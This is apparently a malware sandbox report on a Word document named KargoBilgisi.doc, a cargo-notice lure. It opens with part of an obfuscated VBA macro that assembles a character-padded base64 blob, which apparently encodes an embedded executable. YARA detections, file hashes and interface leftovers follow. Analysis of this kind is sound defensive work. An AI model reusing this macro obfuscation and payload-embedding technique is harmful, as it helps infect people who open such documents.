xPBFfSQK = xPBFfSQK & "1]c]m]U]9]b]m]V]1]d]H]J]h]b]C]w]g]U]H]V]i]b]G]l]j]S]2]V]5]V]G]9]r]Z]W]4]9]Y]j]c]3]Y]T]V]j]N]T]Y]x]O]T]M]0]Z]T]A]4]O]S]N]T]e]X]N]0]Z]W]0]u]U]m]V]z]b]3]V]y]Y]2]V]z]L]l]J]1]b]n]R]p]b]W]V]S]Z]X]N]v]d]X]J]j]Z]V]N]l]d]A]I]A]A]A]A]A]A]A]A]A]A]A]A]A]A]F]B]B]R]F]B]B]R]F]C]0]A]A]A]A]A]A]A]A]A]P]p]R]u]1]s]A]A]A]A]A]A]g]A]A]A]B]w]B]A]A]A]A]L]g]A]A]A]B]A]A]A]F]J]T]R]F]O]l]3]y]C]w]W]K]N]t]R]b]Q]R]4]/]C]P]I]e]o]k]A]Q]A]A]A]E]Q]6]X]E]R]v]d]2]5]s]b]2]F]k]R]n]J]v]b]V]V]S]T]F]x]E]b]3]d]u]b]G]9]h]Z]F]x]E]b]3]d]u]b]G]9]h]Z]F]x]v]Y]m]p]c]U]m]V]s]Z]W]F]z]Z]V]x]E]b]3]d]u]b]G]9]h]Z]C]5]w]Z]G]I]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]"
xPBFfSQK = xPBFfSQK & "A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]R]C]8]A]A]A]A]A]A]A]A]A]A]A]A]A]X]i]8]A]A]A]A]g]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]F]A]v]A]A]A]A]A]A]A]A]A]A]A]A]A]"
xPBFfSQK = xPBFfSQK & "A]A]A]X]0]N]v]c]k]V]4]Z]U]1]h]a]W]4]A]b]X]N]j]b]3]J]l]Z]S]5]k]b]G]w]A]A]A]A]A]A]P]8]l]A]C]B]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]C]A]B]A]A]A]A]A]g]A]A]C]A]G]A]A]A]A]F]A]A]A]I]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]E]A]A]Q]A]A]A]D]g]A]A]I]A]A]"
xPBFfSQK = xPBFfSQK & "A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]E]A]A]A]A]A]A]I]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]E]A]A]Q]A]A]A]G]g]A]A]I]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]E]A]A]A]A]A]A]K]w]D]A]A]C]Q]Q]A]A]A]H]A]M]A]A]A]A]A]A]A]A]A]A]A]A]A]H]A]M]0]A]A]A]A]V]g]B]T]A]F]8]A]V]g]B]F]A]F]I]A]U]w]B]J]A]E]8]A]T]g]B]f]A]E]k]A]T]g]B]G]A]E]8]A]A]A]A]A]A]L]0]E]7]/]4]A]A]A]E]A]A]A]A]B]A]A]A]A]A]A]A]A]A]A]E]A]A]A]A]A]A]D]8]A]A]A]A]A]A]A]A]A]B]A]A]A]A]A]E]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]B]E]A]A]A]A]A]Q]B]W]A]G]E]A]c]g]B]G]A]G]k]A]b]A]B]l]A]E]k]A]b]g]B]m]A]G]8]A]A]A]A]A]A]C]Q]A]B]A]A]A]A]F]Q]A]c]g]B]h]A]G]4]A]c]w]B]s]A]G]E]A]d]A]B]"
xPBFfSQK = xPBFfSQK & "p]A]G]8]A]b]g]A]A]A]A]A]A]A]A]C]w]B]H]w]C]A]A]A]B]A]F]M]A]d]A]B]y]A]G]k]A]b]g]B]n]A]E]Y]A]a]Q]B]s]A]G]U]A]S]Q]B]u]A]G]Y]A]b]w]A]A]A]F]g]C]A]A]A]B]A]D]A]A]M]A]A]w]A]D]A]A]M]A]A]0]A]G]I]A]M]A]A]A]A]B]o]A]A]Q]A]B]A]E]M]A]b]w]B]t]A]G]0]A]Z]Q]B]u]A]H]Q]A]c]w]A]A]A]A]A]A]A]A]A]i]A]A]E]A]A]Q]B]D]A]G]8]A]b]Q]B]w]A]G]E]A]b]g]B]5]A]E]4]A]Y]Q]B]t]A]G]U]A]A]A]A]A]A]A]A]A]A]A]A]6]A]A]k]A]A]Q]B]G]A]G]k]A]b]A]B]l]A]E]Q]A]Z]Q]B]z]A]G]M]A]c]g]B]p]A]H]A]A]d]A]B]p]A]G]8]A]b]g]A]A]A]A]A]A]R]A]B]v]A]H]c]A]b]g]B]s]A]G]8]A]Y]Q]B]k]A]A]A]A]A]A]A]w]A]A]g]A]A]Q]B]G]A]G]k]A]b]A]B]l]A]F]Y]A]Z]Q]B]y]A]H]M]A]a]Q]B]v]A]G]4]A]A]A]A]A]A]D]E]A]L]g]"
xPBFfSQK = xPBFfSQK & "A]w]A]C]4]A]M]A]A]u]A]D]A]A]A]A]A]6]A]A]0]A]A]Q]B]J]A]G]4]A]d]A]B]l]A]H]I]A]b]g]B]h]A]G]w]A]T]g]B]h]A]G]0]A]Z]Q]A]A]A]E]Q]A]b]w]B]3]A]G]4]A]b]A]B]v]A]G]E]A]Z]A]A]u]A]G]U]A]e]A]B]l]A]A]A]A]A]A]B]I]A]B]I]A]A]Q]B]M]A]G]U]A]Z]w]B]h]A]G]w]A]Q]w]B]v]A]H]A]A]e]Q]B]y]A]G]k]A]Z]w]B]o]A]H]Q]A]A]A]B]D]A]G]8]A]c]A]B]5]A]H]I]A]a]Q]B]n]A]G]g]A]d]A]A]g]A]K]k]A]I]A]A]g]A]D]I]A]M]A]A]x]A]D]g]A]A]A]A]q]A]A]E]A]A]Q]B]M]A]G]U]A]Z]w]B]h]A]G]w]A]V]A]B]y]A]G]E]A]Z]A]B]l]A]G]0]A]Y]Q]B]y]A]G]s]A]c]w]A]A]A]A]A]A]A]A]A]A]A]E]I]A]D]Q]A]B]A]E]8]A]c]g]B]p]A]G]c]A]a]Q]B]u]A]G]E]A]b]A]B]G]A]G]k]A]b]A]B]l]A]G]4]A]Y]Q]B]t]A]G]U]A]A]A]B]E]A]G]8]A]d]"
xPBFfSQK = xPBFfSQK & "w]B]u]A]G]w]A]b]w]B]h]A]G]Q]A]L]g]B]l]A]H]g]A]Z]Q]A]A]A]A]A]A]M]g]A]J]A]A]E]A]U]A]B]y]A]G]8]A]Z]A]B]1]A]G]M]A]d]A]B]O]A]G]E]A]b]Q]B]l]A]A]A]A]A]A]B]E]A]G]8]A]d]w]B]u]A]G]w]A]b]w]B]h]A]G]Q]A]A]A]A]A]A]D]Q]A]C]A]A]B]A]F]A]A]c]g]B]v]A]G]Q]A]d]Q]B]j]A]H]Q]A]V]g]B]l]A]H]I]A]c]w]B]p]A]G]8]A]b]g]A]A]A]D]E]A]L]g]A]w]A]C]4]A]M]A]A]u]A]D]A]A]A]A]A]4]A]A]g]A]A]Q]B]B]A]H]M]A]c]w]B]l]A]G]0]A]Y]g]B]s]A]H]k]A]I]A]B]W]A]G]U]A]c]g]B]z]A]G]k]A]b]w]B]u]A]A]A]A]M]Q]A]u]A]D]A]A]L]g]A]w]A]C]4]A]M]A]A]A]A]L]x]D]A]A]D]q]A]Q]A]A]A]A]A]A]A]A]A]A]A]A]D]v]u]7]8]8]P]3]h]t]b]C]B]2]Z]X]J]z]a]W]9]u]P]S]I]x]L]j]A]i]I]G]V]u]Y]2]9]k]a]W]5]n]P]S]J]V]"
xPBFfSQK = xPBFfSQK & "V]E]Y]t]O]C]I]g]c]3]R]h]b]m]R]h]b]G]9]u]Z]T]0]i]e]W]V]z]I]j]8]+]D]Q]o]N]C]j]x]h]c]3]N]l]b]W]J]s]e]S]B]4]b]W]x]u]c]z]0]i]d]X]J]u]O]n]N]j]a]G]V]t]Y]X]M]t]b]W]l]j]c]m]9]z]b]2]Z]0]L]W]N]v]b]T]p]h]c]2]0]u]d]j]E]i]I]G]1]h]b]m]l]m]Z]X]N]0]V]m]V]y]c]2]l]v]b]j]0]i]M]S]4]w]I]j]4]N]C]i]A]g]P]G]F]z]c]2]V]t]Y]m]x]5]S]W]R]l]b]n]R]p]d]H]k]g]d]m]V]y]c]2]l]v]b]j]0]i]M]S]4]w]L]j]A]u]M]C]I]g]b]m]F]t]Z]T]0]i]T]X]l]B]c]H]B]s]a]W]N]h]d]G]l]v]b]i]5]h]c]H]A]i]L]z]4]N]C]i]A]g]P]H]R]y]d]X]N]0]S]W]5]m]b]y]B]4]b]W]x]u]c]z]0]i]d]X]J]u]O]n]N]j]a]G]V]t]Y]X]M]t]b]W]l]j]c]m]9]z]b]2]Z]0]L]W]N]v]b]T]p]h]c]2]0]u]d]j]I]i]P]g]0]K]I]C]A]g]I]D]x]z]Z]W]N]"
xPBFfSQK = xPBFfSQK & "1]c]m]l]0]e]T]4]N]C]i]A]g]I]C]A]g]I]D]x]y]Z]X]F]1]Z]X]N]0]Z]W]R]Q]c]m]l]2]a]W]x]l]Z]2]V]z]I]H]h]t]b]G]5]z]P]S]J]1]c]m]4]6]c]2]N]o]Z]W]1]h]c]y]1]t]a]W]N]y]b]3]N]v]Z]n]Q]t]Y]2]9]t]O]m]F]z]b]S]5]2]M]y]I]+]D]Q]o]g]I]C]A]g]I]C]A]g]I]D]x]y]Z]X]F]1]Z]X]N]0]Z]W]R]F]e]G]V]j]d]X]R]p]b]2]5]M]Z]X]Z]l]b]C]B]s]Z]X]Z]l]b]D]0]i]Y]X]N]J]b]n]Z]v]a]2]V]y]I]i]B]1]a]U]F]j]Y]2]V]z]c]z]0]i]Z]m]F]s]c]2]U]i]L]z]4]N]C]i]A]g]I]C]A]g]I]D]w]v]c]m]V]x]d]W]V]z]d]G]V]k]U]H]J]p]d]m]l]s]Z]W]d]l]c]z]4]N]C]i]A]g]I]C]A]8]L]3]N]l]Y]3]V]y]a]X]R]5]P]g]0]K]I]C]A]8]L]3]R]y]d]X]N]0]S]W]5]m]b]z]4]N]C]j]w]v]Y]X]N]z]Z]W]1]i]b]H]k]+]A]A]A]A]A]A]A]A]A]A]A]A]A]A]"
xPBFfSQK = xPBFfSQK & "A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]C]A]A]A]A]w]A]A]A]B]w]P]w]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]"
xPBFfSQK = xPBFfSQK & "A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]"
xPBFfSQK = xPBFfSQK & "A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]A]=]"
xPBFfSQK = Replace(xPBFfSQK, "]", "")
End Function


Private Sub Document_Sync(ByVal SyncEventType As Office.MsoSyncEventType)

End Sub

Private Sub Document_XMLAfterInsert(ByVal NewXMLNode As XMLNode, ByVal InUndoRedo As Boolean)

End Sub

Private Sub Document_XMLBeforeDelete(ByVal DeletedRange As Range, ByVal OldXMLNode As XMLNode, ByVal InUndoRedo As Boolean)

End Sub
YARA Matches
»
Rule Name Rule Description Classification Severity Actions
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
...
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
...
VBA_Obfuscation_ObjectName VBA initializes COM object from long variable name; possible obfuscation -
2/5
...
VBA_Obfuscation_ObjectName VBA initializes COM object from long variable name; possible obfuscation -
2/5
...
c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 Embedded File XML
Whitelisted
...
»
Parent File C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc
Mime Type application/xml
File Size 0.27 KB
MD5 dd79e6440b0515bfcf771c2c5286a2c8 Copy to Clipboard
SHA1 40dc1e00e2663cb33f8c296cdb0cd52fa07a87b6 Copy to Clipboard
SHA256 c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 Copy to Clipboard
SSDeep 6:TMVBd6OjzmC3mUifmReUdzXxjmUA+DYQXzReYX9v48sEJ:TMHdtWa6fmEUdzXV4+DYQDEEQWJ Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2012-11-16 07:03 (UTC+1)
Last Seen 2018-10-01 09:48 (UTC+2)
c:\users\bgc6u8oy yxgxkr\appdata\local\gdipfontcachev1.dat Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 108.91 KB
MD5 945637b742f52d1299ae49ca23a8312f Copy to Clipboard
SHA1 edc6dcab8d0a9639f24de8f3527f1ca35f57cbdd Copy to Clipboard
SHA256 10701ed1bb54a7be4cb0321d9a1e0b143896685cdba6b5400bfe8457d4ee2a69 Copy to Clipboard
SSDeep 1536:746D5oHgTFWQpBaDBsDV3bTyuuZzER8kTF:746KQpgDBsRuX4 Copy to Clipboard
ca02058a1d1515d8498847381ae4a5c0df3389474a114c683f05fd6461616a30 Embedded File Unknown
Unknown
...
»
Parent File C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc
Mime Type application/CDFV2-unknown
File Size 39.50 KB
MD5 ff4894e9d021f6b46f4ca68e85b5207a Copy to Clipboard
SHA1 67e18ad38ca5fcd352aeab195cef12f39e0eb8b5 Copy to Clipboard
SHA256 ca02058a1d1515d8498847381ae4a5c0df3389474a114c683f05fd6461616a30 Copy to Clipboard
SSDeep 384:ptWIu4Gs9UL6DOCJvlKGY647W6ypYHWMS1YowRLqDwOqNVDVMN+i6uE2b8F3sJnw:RGkK7WlCWMSmo2q3CV2bBKmsUQB9HB Copy to Clipboard
4906bcc84911fce066edaf66c56f9b95de9ec30fd8a97fd443a69164cabe4099 Embedded File XML
Unknown
...
»
Parent File C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc
Mime Type application/xml
File Size 3.64 KB
MD5 45199960f25a1822df47d66266fb8d7a Copy to Clipboard
SHA1 baebfaf069647fa0fb1d6a653ae7db61afd3b99d Copy to Clipboard
SHA256 4906bcc84911fce066edaf66c56f9b95de9ec30fd8a97fd443a69164cabe4099 Copy to Clipboard
SSDeep 96:vmlAKAzHLCswiZS6mmY+bzZliSwXi/iZo4M1bZFe81PDfdu3zv6:sgmmY+ZsPObZFe81PxujC Copy to Clipboard
c04cd5933bc4af2e61caa33a89545c22f9b7731882838f0a44386899163f1f73 Embedded File XML
Unknown
...
»
Parent File C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc
Mime Type application/xml
File Size 2.74 KB
MD5 9bcf6c9bc3fae361bae086af50dfad63 Copy to Clipboard
SHA1 db69174ad98ee26e9486a2258f3c374cfa804378 Copy to Clipboard
SHA256 c04cd5933bc4af2e61caa33a89545c22f9b7731882838f0a44386899163f1f73 Copy to Clipboard
SSDeep 48:ciec6mNYYNEbliS+B1+C+yA+kS14oM+lqM+IyM+wM+wM+obqM+HAayVKTgYTjvG:+c6mmY+bliSwXiNI4NExbuEvnCTgai Copy to Clipboard
bade085884201af5d4753e71f7a1d108403958e22f79d8e9ada4fb11120d95d4 Embedded File XML
Unknown
...
»
Parent File C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc
Mime Type application/xml
File Size 1.05 KB
MD5 4d5cdc03c64ab23fd7d5f9429dc55cde Copy to Clipboard
SHA1 60df69e8b6197132c271fcde5bf796d76ba79bb6 Copy to Clipboard
SHA256 bade085884201af5d4753e71f7a1d108403958e22f79d8e9ada4fb11120d95d4 Copy to Clipboard
SSDeep 24:2dtWa6ffa7b6flYR7/6flYq7a6flYIO7V4+Q0HpQ7u6flY6J67o26flYn07Q6flh:c01naX6NYRz6NYqG6NYVh7Q0HpQS6NYg Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image